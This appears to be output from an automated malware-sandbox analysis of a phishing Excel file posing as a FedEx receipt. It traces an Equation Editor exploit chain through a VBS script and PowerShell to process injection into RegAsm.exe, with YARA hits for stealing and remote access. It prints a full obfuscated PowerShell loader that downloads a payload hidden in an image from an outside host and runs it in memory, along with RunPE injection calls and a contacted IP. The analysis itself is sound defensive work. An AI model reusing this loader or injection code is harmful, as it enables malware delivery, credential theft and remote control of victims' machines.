Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: FedEx Receipt_53065724643.xls Stream path 'MBD00023D34/Package' entropy: 7.96088183378 (max. 8.0)
Source: FedEx Receipt_53065724643.xls Stream path 'Workbook' entropy: 7.99936801752 (max. 8.0)
Source: ~DFE1D622D06AD63FEF.TMP.0.dr Stream path 'Package' entropy: 7.95091166004 (max. 8.0)
Source: B9930000.0.dr Stream path 'MBD00023D34/Package' entropy: 7.95091166004 (max. 8.0)
Source: B9930000.0.dr Stream path 'Workbook' entropy: 7.99916779387 (max. 8.0)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_023E0101 rdtsc 12_2_023E0101
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1468
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3293
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3524 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 3656 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3776 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3780 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3716 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3828 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_023E0101 rdtsc 12_2_023E0101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_023907AC NtCreateMutant,LdrInitializeThunk, 12_2_023907AC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_03640805 mov edx, dword ptr fs:[00000030h] 7_2_03640805
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_02380080 mov ecx, dword ptr fs:[00000030h] 12_2_02380080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_023800EA mov eax, dword ptr fs:[00000030h] 12_2_023800EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_023A26F8 mov eax, dword ptr fs:[00000030h] 12_2_023A26F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 41.216.183.13 80
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), typeof(CreateApi)))
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), typeof(CreateApi)))
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num7 + num14, array2, array2.Length, ref bytesWritten)
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs Reference to suspicious API methods: lIuveTP8wwjVYKV1XP(VirtualAllocEx, processInformation.ProcessHandle, 0, length, 12288, 64)
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num15 + 8, ref buffer, 4, ref bytesWritten)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "('pvllink = ta4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235ta4'+'; pvlwebclient ='+' new-object system.net.webclient'+'; try { pvldownloadeddata = pvlwebcl'+'ient.downloaddata(pvllink) } catch { '+'write-h'+'ost ta4failed to download data from pvllinkta4 -foregroundcol'+'or red; exit };'+' if (pvldownloadeddata -ne pvlnull) { '+'pvlima'+'getex'+'t = [system.text.encoding]::utf8.getstring(pvldownloadeddata'+'); pvlstartfla'+'g = ta4<<base64_start>>ta4; pvlendflag = ta4<<base64_end>'+'>ta4; pvlstartindex = pvlimagetext.indexof('+'pvlstartfl'+'ag); pvlendindex '+'= pvlimag'+'etext.indexo'+'f(pvlend'+'flag); if (pvlstartindex -ge 0 -and '+'pvlendindex -gt pvlstartindex) { pvlstartindex'+' += pvlstartflag.length; pvlbase64length = pvlendi'+'ndex - pvlstartindex; '+'pvlbase64command = pvlimagetext.substring(pvlstartindex,'+' pvlbase64length)'+'; pv'+'lcomma'+'ndbytes = '+'[system.convert]::frombase64string(pvlbase64command);'+' pvlloadedassembly = [system.reflection.ass'+'embly]::load(pvlcommandb'+'ytes); pvltype = pvlloadedassembly'+'.gettype(ta4runpe.hometa4); pvlmethod = pvltype.getmethod(ta4vaita4).invoke(pvlnull, [object[]] (ta4txt.jnnb/77088/61.532.59.32//:ptthta4 , ta4desativadota4 , ta4desativadota4 , ta4desativadota4,ta4regasm'+'ta4,ta4ta4))'+' } }').replace(([char]80+[char]118+[char]76),'$').replace(([char]116+[char]65+[char]52),[string][char]39)| iex"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY